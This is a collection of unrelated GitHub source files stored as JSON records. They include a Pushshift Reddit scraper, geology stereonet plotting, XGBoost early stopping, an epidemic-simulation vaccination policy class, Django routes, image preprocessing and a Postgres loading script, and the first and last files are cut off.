tqdm(rehydrate_content_pushshift(parent_ids),\n \"rehydrating parents\",\n len(parent_ids)):\n yield parent\n\n\n\ndef get_user_pushshift(user):\n api = PushshiftAPI()\n search_funcs = [api.search_submissions, api.search_comments]\n prefixes = ['t3_', 't1_']\n search_params = 
dict(author=user, )\n yield from scrape_pushshift(\n search_funcs=search_funcs,\n prefixes=prefixes,\n **search_params\n )\n\n\nif __name__ == '__main__':\n print(get_user_pushshift('hide_ous'))\n\n","repo_name":"hide-ous/fear","sub_path":"scrape_fear.py","file_name":"scrape_fear.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"28255527358","text":"\"\"\"\nReproduce Figure 5 from Vollmer, 1995 to illustrate different density contouring\nmethods.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport mplstereonet\n\nimport parse_angelier_data\n\ndef plot(ax, strike, dip, rake, **kwargs):\n ax.rake(strike, dip, rake, 'ko', markersize=2)\n ax.density_contour(strike, dip, rake, measurement='rakes', linewidths=1,\n cmap='jet', **kwargs)\n\n\n# Load data from Angelier, 1979\nstrike, dip, rake = parse_angelier_data.load()\n\n# Setup a subplot grid\nfig, axes = mplstereonet.subplots(nrows=3, ncols=4)\n\n# Hide azimuth tick labels\nfor ax in axes.flat:\n ax.set_azimuth_ticks([])\n\ncontours = [range(2, 18, 2), range(1, 21, 2), range(1, 22, 2)]\n\n# \"Standard\" Kamb contouring with different confidence levels.\nfor sigma, ax, contour in zip([3, 2, 1], axes[:, 0], contours):\n # We're reducing the gridsize to more closely match a traditional\n # hand-contouring grid, similar to Kamb's original work and Vollmer's\n # Figure 5. `gridsize=10` produces a 10x10 grid of density estimates.\n plot(ax, strike, dip, rake, method='kamb', sigma=sigma,\n levels=contour, gridsize=10)\n\n# Kamb contouring with inverse-linear smoothing (after Vollmer, 1995)\nfor sigma, ax, contour in zip([3, 2, 1], axes[:, 1], contours):\n plot(ax, strike, dip, rake, method='linear_kamb', sigma=sigma,\n levels=contour)\n template = r'$E={}\\sigma$ Contours: ${}\\sigma,{}\\sigma,\\ldots$'\n ax.set_xlabel(template.format(sigma, *contour[:2]))\n\n# Kamb contouring with exponential smoothing (after Vollmer, 1995)\nfor sigma, ax, contour in zip([3, 2, 1], axes[:, 2], contours):\n plot(ax, strike, dip, rake, method='exponential_kamb', sigma=sigma,\n levels=contour)\n\n# Title the different methods\nmethods = ['Kamb', 'Linear\\nSmoothing', 'Exponential\\nSmoothing']\nfor ax, title in zip(axes[0, :], methods):\n ax.set_title(title)\n\n# Hide top-right axis... (Need to implement Diggle & Fisher's method)\naxes[0, -1].set_visible(False)\n\n# Schmidt contouring (a.k.a. 
1%)\nplot(axes[1, -1], strike, dip, rake, method='schmidt', gridsize=25,\n levels=range(3, 20, 3))\naxes[1, -1].set_title('Schmidt')\naxes[1, -1].set_xlabel(r'Contours: $3\\%,6\\%,\\ldots$')\n\n# Raw data.\naxes[-1, -1].set_azimuth_ticks([])\naxes[-1, -1].rake(strike, dip, rake, 'ko', markersize=2)\naxes[-1, -1].set_xlabel('N={}'.format(len(strike)))\n\nplt.show()\n","repo_name":"joferkington/mplstereonet","sub_path":"examples/contour_angelier_data.py","file_name":"contour_angelier_data.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"16542963281","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 导入常用包\nimport xgboost as xgb\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.feature_selection import SelectFromModel\n\n\n# In[2]:\n\n\n# 数据集\ncancer = datasets.load_breast_cancer()\nX = cancer.data\nY = cancer.target\n\n\n# In[3]:\n\n\n# 数据集的情况\n# X.shape\n# Y.shape\n# X, Y\n\n\n# In[4]:\n\n\n# 拆分训练集、测试集\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 1/5., random_state = 8)\n\n\n# In[5]:\n\n\nxgb_train = xgb.DMatrix(X_train, label = Y_train)\nxgb_test = xgb.DMatrix(X_test, label = Y_test)\n\n\n# In[6]:\n\n\nparams = {\"objective\": \"binary:logistic\",\n \"booster\": \"gbtree\",\n \"eta\": 1,\n \"max_depth\": 2,\n \"eval_metric\": \"auc\"\n }\n\n\n# In[7]:\n\n\nwatchlist = [(xgb_train, 'train')]\n\n\n# In[8]:\n\n\n# 因为在第9轮(即编号为8)后4次中,auc一直没增加,所以停止迭代\n# 如果 watchlist 存在多个元组,则取最后一个元组的值\nbst = xgb.train(params, xgb_train, num_boost_round = 100, evals = watchlist, early_stopping_rounds = 4)\n\n\n# In[9]:\n\n\n# 使用前9棵树进行预测(前9棵数可以通过 bst.best_ntree_limit 来指定)\nY_test_pred = bst.predict(xgb_test, ntree_limit = 9)\nprint(roc_auc_score(Y_test, Y_test_pred))\n\n\n# In[10]:\n\n\nbst.best_score, bst.best_iteration, bst.best_ntree_limit\n\n\n# In[11]:\n\n\n# 共13棵树(编号0~12),bst是12棵树的模型,所以 bst.predict 方法时要使用 ntree_limit 来指定前9棵树\nxgb.to_graphviz(bst, fmap = '', num_trees = 12)\n\n","repo_name":"calxu/xgboost_learning","sub_path":"1_binary_classification/4_early_stopping_rounds/early_stopping_rounds.py","file_name":"early_stopping_rounds.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"6023080746","text":"import copy\nimport random\nfrom functools import partial\nfrom typing import Callable, Dict, List, Union, ValuesView\n\nfrom episimmer.agent import Agent\nfrom episimmer.location import Location\nfrom episimmer.model import BaseModel\n\nfrom .base import AgentPolicy\n\n\nclass VaccineResult():\n \"\"\"\n Stores the information regarding the result of a vaccination.\n\n Args:\n vaccine_name: Name of the vaccine used\n agent: Agent that was vaccinated\n result: Vaccination result (Successful or Unsuccessful)\n time_step: Time step when the vaccination was done\n efficacy: Efficacy of the vaccine administered to the agent\n decay_days: Number of days of protection offered by the vaccine\n current_dose: The dose of the vaccine administered to the agent\n \"\"\"\n def __init__(self, vaccine_name: str, agent: Agent, result: str,\n time_step: int, efficacy: float, decay_days: int,\n current_dose: int):\n self.vaccine_name: str = vaccine_name\n self.agent: Agent = agent\n self.result: str = result\n self.time_stamp: int = time_step\n 
self.efficacy: float = efficacy\n self.protection: int = decay_days\n self.current_dose: int = current_dose\n\n def __repr__(self) -> str:\n \"\"\"\n Shows the representation of the object as the string result\n\n Returns:\n The result of vaccination in string format\n \"\"\"\n return self.result\n\n\nclass VaccineType():\n \"\"\"\n Class for Vaccine.\n\n Args:\n name: Vaccine name\n cost: Cost of the vaccine\n decay: Number of days of protection offered by the vaccine, a list of each dose in case of multi-dose vaccine\n efficacy: Efficacy of the vaccine\n dosage: Number of doses of the vaccine, applies only for multi-dose vaccine\n interval: List specifying minimum days to pass before the administration of the next dose, for each dose of a\n multi-dose vaccine\n \"\"\"\n def __init__(self,\n name: str,\n cost: int,\n decay: Union[List[int], int],\n efficacy: float,\n dosage: Union[int, None] = None,\n interval: Union[List[int], None] = None):\n\n self.vaccine_name: str = name\n self.vaccine_cost: int = cost\n self.decay_days: Union[List[int], int] = decay\n self.efficacy: float = efficacy\n self.dosage: Union[int, None] = dosage\n self.interval: Union[List[int], None] = interval\n\n def vaccinate(self,\n agent: Agent,\n time_step: int,\n dose: int = 1) -> VaccineResult:\n \"\"\"\n Administers the specified dose of the current vaccine to the agent.\n Updates the protection days according to the dose administered.\n\n Args:\n agent: Agent to vaccinate\n time_step: Time step when the vaccination is performed\n dose: The dose of the vaccine to be administered to the agent\n\n Returns:\n Result object of vaccination\n \"\"\"\n result = agent.get_policy_history(\n 'Vaccination')[-1].result if dose > 1 else self.inject_vaccine()\n if result == 'Successful':\n decay_days = self.decay_days[dose -\n 1] if self.dosage else self.decay_days\n else:\n decay_days = 0\n result_obj = VaccineResult(self.vaccine_name, agent, result, time_step,\n self.efficacy, decay_days, dose)\n\n return result_obj\n\n def inject_vaccine(self) -> str:\n \"\"\"\n Injects an agent with the vaccine and returns the result based on vaccine's efficacy.\n\n Returns:\n Result of vaccination (Successful or Unsuccessful)\n \"\"\"\n if random.random() < self.efficacy:\n return 'Successful'\n else:\n return 'Unsuccessful'\n\n\nclass VaccinationPolicy(AgentPolicy):\n \"\"\"\n Class for implementing the vaccination policy.\n Inherits :class:`~episimmer.policy.base.AgentPolicy` class.\n\n An example of a GeneratePolicy.py file illustrating single dose and multi dose vaccination is given below.\n\n .. 
code-block:: python\n :linenos:\n\n from episimmer.policy import vaccination_policy\n\n def generate_policy():\n policy_list=[]\n\n # Single Dose Vaccination\n vp1= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines1 = {\n 'cov_single_dose': {'cost': 40, 'count': 20, 'efficacy': 0.9, 'decay': 40},\n 'cov_single_dose2': {'cost': 50, 'count': 15, 'efficacy': 0.5, 'decay': 30},\n }\n vp1.add_vaccines(vaccines1, 'Single')\n vp1.set_register_agent_vaccine_func(vp1.random_vaccination())\n policy_list.append(vp1)\n\n # Multi Dose Vaccination\n vp2= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines2 = {\n 'cov_multi_dose': {'cost': 40, 'count': 25, 'efficacy': 0.4, 'decay': [15, 14, 8], 'dose': 3, 'interval': [3, 2]},\n 'cov_multi_dose2': {'cost': 30, 'count': 40, 'efficacy': 0.7, 'decay': [20, 25, 17, 5], 'dose': 4, 'interval': [12, 26, 14]},\n 'cov_multi_dose3': {'cost': 30, 'count': 15, 'efficacy': 0.7, 'decay': [8], 'dose': 1, 'interval': []}\n }\n vp2.add_vaccines(vaccines2, 'Multi')\n vp2.set_register_agent_vaccine_func(vp2.multi_dose_vaccination())\n policy_list.append(vp2)\n\n return policy_list\n\n Args:\n agents_per_step_fn: User-defined function to specify the number of agents to vaccinate per time step\n \"\"\"\n def __init__(self, agents_per_step_fn: Callable):\n super().__init__('Vaccination')\n\n self.num_agents_to_vaccinate: int = 0\n self.results: List[VaccineResult] = []\n self.available_vaccines: Dict[str, Dict[str,\n Union[int, float, List[int],\n str]]] = {}\n self.vaccines: List[VaccineType] = []\n self.statistics: Dict[str, Dict[str, List[int]]] = {}\n self.statistics_total: Dict[str, List[int]] = {\n 'Total Vaccination': [],\n 'Total Successful': [],\n 'Total Unsuccessful': []\n }\n self.registered_agent_vaccine_func: Union[Callable, None] = None\n assert callable(agents_per_step_fn)\n self.agents_per_step_fn: Callable = agents_per_step_fn\n\n def enact_policy(self,\n time_step: int,\n agents: Dict[str, Agent],\n locations: ValuesView[Location],\n model: Union[BaseModel, None] = None,\n policy_index: int = None) -> None:\n \"\"\"\n Executes vaccination policy for the given time step.\n\n Args:\n time_step: Time step in which the policy is enacted\n agents: Dictionary mapping from agent indices to :class:`~episimmer.agent.Agent` objects\n locations: Collection of :class:`~episimmer.location.Location` objects\n model: Disease model specified by the user\n policy_index: Policy index passed to differentiate policies.\n \"\"\"\n self.new_time_step(time_step)\n self.set_protection(agents.values())\n self.registered_agent_vaccine_func(agents.values(), time_step)\n self.populate_results()\n self.restrict_agents(agents.values())\n self.get_stats()\n\n def new_time_step(self, time_step: int) -> None:\n \"\"\"\n Creates a list in which vaccine objects are added according to the user’s specification.\n Resets the results of the policy enacted in previous time step and the number of agents to vaccinate in the\n current time step.\n\n Args:\n time_step: Current time step\n \"\"\"\n self.vaccines = []\n self.results = []\n self.num_agents_to_vaccinate = self.agents_per_step_fn(time_step)\n\n for name, vaccine in self.available_vaccines.items():\n for i in range(int(vaccine['count'])):\n vaccine_obj = VaccineType(name, vaccine['cost'],\n vaccine['decay'],\n vaccine['efficacy'],\n vaccine.get('dose', 0),\n vaccine.get('interval', []))\n self.vaccines.append(vaccine_obj)\n\n def add_vaccines(self,\n vaccines: Dict[str, Dict[str, Union[int, float, List[int],\n 
str]]],\n dosage: str = 'Single') -> None:\n \"\"\"\n This function enables the user to add vaccines.\n\n Parameters to be specified for single dose vaccines in the vaccines dict:\n\n * cost: Cost of vaccine.\n * count: Number of vaccine available.\n * efficacy: Vaccine efficacy.\n * decay: Number of days of protection offered by the vaccine.\n\n .. code-block:: python\n :linenos:\n\n vp1= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines1 = {\n 'cov_single_dose': {'cost': 40, 'count': 20, 'efficacy': 0.9, 'decay': 40},\n 'cov_single_dose2': {'cost': 50, 'count': 15, 'efficacy': 0.5, 'decay': 30},\n }\n vp1.add_vaccines(vaccines1, 'Single')\n\n Parameters to be specified for multi dose vaccines in the vaccines dict:\n\n * cost: Cost of vaccine.\n * count: Number of vaccine available.\n * efficacy: Vaccine efficacy.\n * decay: A list of number of days of protection offered by each dose of the vaccine.\n * dose: Number of doses of the vaccine.\n * interval: A list specifying minimum days to pass before the administration of the next dose for each dose.\n\n\n .. code-block:: python\n :linenos:\n\n vp2= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines2 = {\n 'cov_multi_dose': {'cost': 40, 'count': 25, 'efficacy': 0.4, 'decay': [15, 14, 8], 'dose': 3, 'interval': [3, 2]},\n 'cov_multi_dose2': {'cost': 30, 'count': 40, 'efficacy': 0.7, 'decay': [20, 25, 17, 5], 'dose': 4, 'interval': [12, 26, 14]},\n 'cov_multi_dose3': {'cost': 30, 'count': 15, 'efficacy': 0.7, 'decay': [8], 'dose': 1, 'interval': []}\n }\n vp2.add_vaccines(vaccines2, 'Multi')\n\n Args:\n vaccines: A dictionary mapping vaccine names to its parameters\n dosage: Specifies if the vaccines are either ``Single`` dose or ``Multi`` dose\n \"\"\"\n if dosage == 'Single':\n for name, vaccine in vaccines.items():\n if not isinstance(vaccine['decay'], int):\n raise TypeError('Vaccine decay must be a type integer')\n self.available_vaccines[name] = vaccine\n self.available_vaccines[name]['type'] = dosage\n self.statistics[name] = {\n 'Total Vaccination': [],\n 'Total Successful': [],\n 'Total Unsuccessful': []\n }\n elif dosage == 'Multi':\n for name, vaccine in vaccines.items():\n if not isinstance(vaccine['decay'], list):\n raise TypeError('Vaccine decay must be a list')\n if vaccine.get('dose') is None:\n raise Exception('Dose parameter missing')\n\n if vaccine.get('interval') is None:\n raise Exception('Interval parameter missing')\n\n if not isinstance(vaccine['interval'], list):\n raise TypeError('Interval must be a list')\n if len(vaccine['decay']) != vaccine['dose']:\n raise ValueError(\n 'Vaccine decay must be a list of length equal to the count of vaccine dosage'\n )\n if len(vaccine['interval']) != vaccine['dose'] - 1:\n raise ValueError(\n 'Vaccine interval must be a list of length one less than the count of vaccine dosage'\n )\n self.available_vaccines[name] = vaccine\n self.available_vaccines[name]['type'] = dosage\n self.statistics[name] = {\n 'Total Vaccination': [],\n 'Total Successful': [],\n 'Total Unsuccessful': []\n }\n\n def set_register_agent_vaccine_func(self, func: Callable) -> None:\n \"\"\"\n Registers the function that determines the type of vaccination to be performed.\n The user must specify one of the following functions\n\n * :meth:`~random_vaccination`\n * :meth:`~multi_dose_vaccination`\n\n .. 
code-block:: python\n :linenos:\n\n vp1.set_register_agent_vaccine_func(vp1.random_vaccination())\n vp2.set_register_agent_vaccine_func(vp2.multi_dose_vaccination())\n\n Args:\n func: Function that determines the type of vaccination to be performed\n \"\"\"\n self.registered_agent_vaccine_func = func\n\n def full_random_vaccination(self, attribute: Union[str, None],\n value_list: List[str],\n agents: ValuesView[Agent],\n time_step: int) -> None:\n \"\"\"\n If the number of agents vaccinated is less than the maximum number of agents to vaccinate per time step,\n for every unvaccinated agent this function randomly chooses a vaccine from the list of vaccines and performs\n vaccination on the agent. This function is valid only for single dose vaccines.\n\n Args:\n agents: Collection of :class:`~episimmer.agent.Agent` objects\n time_step: Current time step\n attribute: Attribute name of agents\n value_list: List of attribute values of agents\n \"\"\"\n agents_copy = copy.copy(list(agents))\n random.shuffle(agents_copy)\n curr_agents_to_vaccinate = self.num_agents_to_vaccinate\n\n for agent in agents_copy:\n if curr_agents_to_vaccinate <= 0:\n break\n\n if attribute is None or agent.info[attribute] in value_list:\n if agent.get_policy_state(\n 'Vaccination') is None and self.vaccines:\n current_vaccine = random.choice(self.vaccines)\n result = current_vaccine.vaccinate(agent, time_step)\n self.results.append(result)\n self.vaccines.remove(current_vaccine)\n curr_agents_to_vaccinate -= 1\n\n def random_vaccination(self,\n attribute: Union[str, None] = None,\n value_list: List[str] = []) -> Callable:\n \"\"\"\n This function can be used by the user in ``Generate_policy.py`` to specify randomized vaccination to be\n performed for the agents. This function returns a partial function of :meth:`~full_random_vaccination`.\n\n An example of a GeneratePolicy.py file illustrating single dose vaccination is given below.\n\n .. 
code-block:: python\n :linenos:\n :emphasize-lines: 12\n\n from episimmer.policy import vaccination_policy\n\n def generate_policy():\n policy_list=[]\n\n vp1= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines1 = {\n 'cov_single_dose': {'cost': 40, 'count': 20, 'efficacy': 0.9, 'decay': 40},\n 'cov_single_dose2': {'cost': 50, 'count': 15, 'efficacy': 0.5, 'decay': 30},\n }\n vp1.add_vaccines(vaccines1, 'Single')\n vp1.set_register_agent_vaccine_func(vp1.random_vaccination())\n policy_list.append(vp1)\n\n return policy_list\n\n Args:\n attribute: Attribute name of agents\n value_list: List of attribute values of agents\n\n Returns:\n Partial function of :meth:`~full_random_vaccination`\n \"\"\"\n assert isinstance(value_list, list)\n return partial(self.full_random_vaccination, attribute, value_list)\n\n def full_multi_dose_vaccination(self, attribute: Union[str, None],\n value_list: List[str],\n agents: ValuesView[Agent],\n time_step: int) -> None:\n \"\"\"\n If the number of agents vaccinated is less than the maximum number of agents to vaccinate per time step,\n for every unvaccinated agent this function randomly chooses a vaccine from the list of vaccines and performs\n vaccination on the agent, and for every vaccinated agent if it is time for next dose, the next dose of the same\n vaccine is vaccinated for the agent.\n This function is valid only for multi dose vaccines.\n\n Args:\n agents: Collection of :class:`~episimmer.agent.Agent` objects\n time_step: Current time step\n attribute: Attribute name of agents\n value_list: List of attribute values of agents\n \"\"\"\n agents_copy = copy.copy(list(agents))\n random.shuffle(agents_copy)\n curr_agents_to_vaccinate = self.num_agents_to_vaccinate\n\n for agent in agents_copy:\n if curr_agents_to_vaccinate <= 0:\n break\n\n if attribute is None or agent.info[attribute] in value_list:\n history = self.get_agent_policy_history(agent)\n lh = history[-1] if history else None\n\n if agent.get_policy_state(\n 'Vaccination') is None and self.vaccines:\n current_vaccine = random.choice(self.vaccines)\n result = current_vaccine.vaccinate(agent, time_step)\n self.results.append(result)\n self.vaccines.remove(current_vaccine)\n curr_agents_to_vaccinate -= 1\n\n elif (lh is not None\n and lh.vaccine_name in self.available_vaccines\n and self.available_vaccines[lh.vaccine_name]['type']\n == 'Multi'):\n if (lh.current_dose <\n self.available_vaccines[lh.vaccine_name]['dose']\n and time_step - lh.time_stamp >=\n self.available_vaccines[lh.vaccine_name]\n ['interval'][lh.current_dose - 1]):\n current_vaccine = None\n for vaccine in self.vaccines:\n if vaccine.vaccine_name == lh.vaccine_name:\n current_vaccine = vaccine\n break\n if current_vaccine is not None:\n result = current_vaccine.vaccinate(\n agent, time_step, lh.current_dose + 1)\n self.results.append(result)\n self.vaccines.remove(current_vaccine)\n curr_agents_to_vaccinate -= 1\n\n def multi_dose_vaccination(self,\n attribute: Union[str, None] = None,\n value_list: List[str] = []) -> Callable:\n \"\"\"\n This function can be used by the user in ``Generate_policy.py`` to specify multi-dose vaccination to be\n performed for the agents. This function returns a partial function of :meth:`~full_multi_dose_vaccination`.\n\n An example of a GeneratePolicy.py file illustrating multi dose vaccination is given below.\n\n .. 
code-block:: python\n :linenos:\n :emphasize-lines: 13\n\n from episimmer.policy import vaccination_policy\n\n def generate_policy():\n policy_list=[]\n\n vp2= vaccination_policy.VaccinationPolicy(lambda x: 100)\n vaccines2 = {\n 'cov_multi_dose': {'cost': 40, 'count': 25, 'efficacy': 0.4, 'decay': [15, 14, 8], 'dose': 3, 'interval': [3, 2]},\n 'cov_multi_dose2': {'cost': 30, 'count': 40, 'efficacy': 0.7, 'decay': [20, 25, 17, 5], 'dose': 4, 'interval': [12, 26, 14]},\n 'cov_multi_dose3': {'cost': 30, 'count': 15, 'efficacy': 0.7, 'decay': [8], 'dose': 1, 'interval': []}\n }\n vp2.add_vaccines(vaccines2, 'Multi')\n vp2.set_register_agent_vaccine_func(vp2.multi_dose_vaccination())\n policy_list.append(vp2)\n\n return policy_list\n\n Args:\n attribute: Attribute name of agents\n value_list: List of attribute values of agents\n\n Returns:\n Partial function of :meth:`~full_multi_dose_vaccination`\n \"\"\"\n return partial(self.full_multi_dose_vaccination, attribute, value_list)\n\n def set_protection(self, agents: ValuesView[Agent]) -> None:\n \"\"\"\n For every vaccinated agent the protection days offered by the vaccine in agent history is decremented by 1.\n\n Args:\n agents: Collection of :class:`~episimmer.agent.Agent` objects\n \"\"\"\n for agent in agents:\n history = self.get_agent_policy_history(agent)\n # dict of result objects\n if len(history\n ) == 0 or history[-1].result == 'Unsuccessful' or history[\n -1].protection == 0:\n continue\n else:\n history[-1].protection -= 1\n\n def populate_results(self) -> None:\n \"\"\"\n Updates agent policy history and state from the list of results.\n \"\"\"\n for result_obj in self.results:\n agent = result_obj.agent\n self.update_agent_policy_history(agent, result_obj)\n self.update_agent_policy_state(agent, result_obj.result)\n\n def restrict_agents(self, agents: ValuesView[Agent]) -> None:\n \"\"\"\n Restricts the ability of a vaccinated agent to receive an infection.\n\n Args:\n agents: Collection of :class:`~episimmer.agent.Agent` objects\n \"\"\"\n for agent in agents:\n history = self.get_agent_policy_history(agent)\n if len(history) != 0:\n if history[-1].result == 'Successful':\n if history[-1].protection >= 1:\n agent.protect()\n\n def get_stats(self) -> None:\n \"\"\"\n Calculates the overall statistics of the vaccines administered.\n \"\"\"\n self.statistics_total['Total Vaccination'].append(0)\n self.statistics_total['Total Successful'].append(0)\n self.statistics_total['Total Unsuccessful'].append(0)\n for name in self.available_vaccines.keys():\n self.statistics[name]['Total Vaccination'].append(0)\n self.statistics[name]['Total Successful'].append(0)\n self.statistics[name]['Total Unsuccessful'].append(0)\n\n for result_obj in self.results:\n self.statistics_total['Total Vaccination'][-1] += 1\n name = result_obj.vaccine_name\n self.statistics[name]['Total Vaccination'][-1] += 1\n result = result_obj.result\n if result == 'Successful':\n self.statistics[name]['Total Successful'][-1] += 1\n self.statistics_total['Total Successful'][-1] += 1\n elif result == 'Unsuccessful':\n self.statistics[name]['Total Unsuccessful'][-1] += 1\n self.statistics_total['Total Unsuccessful'][-1] += 1\n","repo_name":"healthbadge/episimmer","sub_path":"episimmer/policy/vaccination_policy.py","file_name":"vaccination_policy.py","file_ext":"py","file_size_in_byte":24187,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"36016155727","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.intro, name=\"intro\"),\n path('store/', views.store, name=\"store\"),\n\n path('store//', views.PostDetailView.as_view(), name='product'),\n\n path('basket/', views.basket, name=\"basket\"),\n path('checkout/', views.checkout, name=\"checkout\"),\n\n path('update_item/', views.updateItem, name=\"update_item\"),\n\n path('view_info/', views.view_info, name=\"view_info\")\n\n]\n","repo_name":"Raretears1/book_shop","sub_path":"shop/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8114450842","text":"import numpy as np\nimport cv2\nfrom assignment_3_qn_1 import DFT_2D_FROM_1D\n\nclass IDFT_2D_FROM_1D:\n def __init__(self):\n print(\"[Class Info] IDFT_2D_FROM_1D class info\")\n def idft_2d(self, dft_2d, filter_size):\n \"\"\"\n\n :param dft_2d:\n :return:\n \"\"\"\n inverse_transform = np.empty((filter_size, filter_size), dtype=np.complex128)\n for row in range(filter_size):\n inverse_transform[row, 0:filter_size] = np.fft.ifft(np.fft.fftshift(dft_2d[row, 0:filter_size]))\n final_inverse_transform = np.empty(dft_2d.shape, dtype=np.complex128)\n for col in range(filter_size):\n final_inverse_transform[0:filter_size, col] = np.fft.ifft(np.fft.fftshift(inverse_transform[0:filter_size, col]))\n # np.fft.ifft2(dft_2d)\n return final_inverse_transform\n\n\n","repo_name":"vikash0837/Digital-Image-Processing","sub_path":"assignment3/assignment_3_qn_2.py","file_name":"assignment_3_qn_2.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24303704743","text":"#\t\t\t\t\t\tram\tdisco\r\nlugar = Field(\"lugar\")\r\nip = Field(\"ip\",requires = IS_IPV4(),default=\"0.0.0.0\")\r\nmascara_subred = Field(\"mascara_subred\",requires = IS_IPV4(),default=\"0.0.0.0\")\r\npuerta_enlace = Field(\"puerta_enlace\",requires = IS_IPV4(),default=\"0.0.0.0\")\r\ncod_seguridad = Field(\"cod_seguridad\")\r\nprocesador = Field(\"procesador\")\r\nram = Field(\"ram\")\r\ndisco = Field(\"disco\")\r\nno_inventario = Field(\"no_inventario\")\r\nmac_address = Field(\"mac_address\")\r\ndb.define_table(\"config_nautas\",lugar,ip,mascara_subred,puerta_enlace,cod_seguridad,procesador,ram,disco,no_inventario,mac_address)\r\ndb.config_nautas.id.readable = 0\r\n#Servicio\t\tTipo de servicio\t\t\t\tSector\t\t\t\t\t\t\tNo de Traza\tSoporte\t\tRuta\t\t\tTerminal\tDirección del Terminal\tCircuito de Linea\tSitio\tCentral Digital\r\n","repo_name":"geordanisb/sisgiem","sub_path":"applications/ti/models/nautas.py","file_name":"nautas.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29055791529","text":"# Script to make hdf5 files from training and test set\nimport numpy as np\nfrom skimage import io, color, exposure, transform\nimport pandas as pd\nimport os\nimport glob\nimport h5py\n\nNUM_CLASSES = 43\nIMG_SIZE = 48\n\n\ndef preprocess_img(img):\n # Histogram normalization in y\n hsv = color.rgb2hsv(img)\n hsv[:, :, 2] = exposure.equalize_hist(hsv[:, :, 2])\n img = color.hsv2rgb(hsv)\n\n # central scrop\n min_side = min(img.shape[:-1])\n centre = img.shape[0] // 2, img.shape[1] // 2\n img = img[centre[0] - min_side // 2:centre[0] + min_side // 2,\n centre[1] - min_side // 2:centre[1] + min_side // 2,\n :]\n\n # rescale to standard size\n img = 
transform.resize(img, (IMG_SIZE, IMG_SIZE))\n\n # roll color axis to axis 0\n img = np.rollaxis(img, -1)\n\n return img\n\n\ndef get_class(img_path):\n return int(img_path.split(r'\\\\'[:-1])[-2])\n\n\nif __name__ == '__main__':\n root_dir = r'GTSRB\\Final_Training\\Images\\\\'[:-1]\n imgs = []\n labels = []\n\n all_img_paths = glob.glob(os.path.join(root_dir, '*\\*.ppm'))\n np.random.shuffle(all_img_paths)\n for img_path in all_img_paths:\n try:\n img = preprocess_img(io.imread(img_path))\n label = get_class(img_path)\n imgs.append(img)\n labels.append(label)\n\n if len(imgs) % 1000 == 0: print(\"Processed {}/{}\".format(len(imgs), len(all_img_paths)))\n except (IOError, OSError):\n print('missed', img_path)\n pass\n\n X = np.array(imgs, dtype='float32')\n Y = np.array(labels, dtype='uint8')\n\n with h5py.File(r'D:\\X3.h5', 'w') as hf:\n hf.create_dataset('imgs', data=X)\n hf.create_dataset('labels', data=Y)\n\n","repo_name":"ibabaev/DeepLearningCourse","sub_path":"tests/preprocess_data_images.py","file_name":"preprocess_data_images.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73756875047","text":"\"\"\"\n ____ ___ \n ____/ / /_ ____ ____ _________ ___ ____ _/ (_)___ ___ _____\n / __ / __ \\/ __ \\/ __ \\/ ___/ __ `__ \\/ __ `/ / /_ / / _ \\/ ___/\n/ /_/ / /_/ / / / / /_/ / / / / / / / / /_/ / / / / /_/ __/ / \n\\__,_/_.___/_/ /_/\\____/_/ /_/ /_/ /_/\\__,_/_/_/ /___/\\___/_/ \n \nMake normalizations about data.\n\"\"\"\nimport asyncpg, asyncio, click, copy\nfrom tqdm import tqdm\nfrom pprint import pprint\n\nconnection_options = {\n \"user\":\"enem\",\n \"password\":\"catapimbas\",\n \"port\":5432,\n \"max_size\":20,\n \"min_size\":20,\n}\nasync def get_connection_pool(**options):\n return await asyncpg.create_pool(**options)\ndef gcs(cmd):\n for line in cmd.split(\"\\n\"):\n if line.startswith(\"INSERT\"):\n return line.split(\"(\")[0]\n return None\nget_commands = lambda sql_script: [\n (\n \"TRUNCATE\" if \"TRUNCATE\" in command else gcs(command),\n command,\n )\n for command in map(lambda x: x + \";\", sql_script.split(\";\"))\n]\n\ndef show(cmds):\n click.clear()\n print(\"Remains: \")\n pprint([c[0] for c in cmds[\"remains\"]])\n print(\"Processing: \")\n pprint([c[0] for c in cmds[\"processing\"]])\n print(\"Finished: \")\n pprint([c[0] for c in cmds[\"finished\"]])\n\nasync def main():\n # Open fill production schema file \n with open(\"../schemas/fill_production_schema.sql\") as f:\n cmds = {\n \"remains\": get_commands(f.read()),\n \"processing\": [],\n \"finished\": [],\n }\n\n pool = await get_connection_pool(**connection_options)\n pprint(cmds)\n async with pool.acquire() as conn:\n for item in copy.deepcopy(cmds[\"remains\"]):\n\n # Move cmd to processing\n cmds[\"remains\"].remove(item)\n cmds[\"processing\"].append(item)\n show(cmds)\n # Process cmd\n if item[1]:\n await conn.execute(item[1])\n # Process \n cmds[\"processing\"].remove(item)\n 